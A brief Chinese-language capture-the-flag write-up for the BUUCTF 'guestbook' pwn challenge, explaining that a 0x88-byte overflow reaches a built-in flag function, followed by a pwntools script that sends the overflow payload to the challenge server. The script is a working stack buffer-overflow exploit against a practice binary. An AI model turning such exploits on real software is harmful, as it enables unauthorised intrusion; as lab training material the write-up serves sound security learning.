讲真这道题目,我一看伪代码还以为又是ret2libc的题目,我直接就去找wp了,结果
有后面函数 。。。。
还有坑。。。。
这里主要没有push ebp 也就是说只是单纯的sub rsp xxx 就是溢出的地方单纯的0x88就ok了
当然,libc的做法肯定也打得通,,,不过没必要了,前面buu一大堆的libc的题目,不差这一道
from pwn import *
from LibcSearcher import*
context(log_level = 'debug')
#io = process("./guestbook")
io = remote("node4.buuoj.cn",26023)
#context.arch = "amd64"
elf = ELF('./guestbook')
flag_addr = 0x0000000000400620
payload1 = b'a'*0x88 + p64(flag_addr)
io.sendline(payload1)
io.interactive()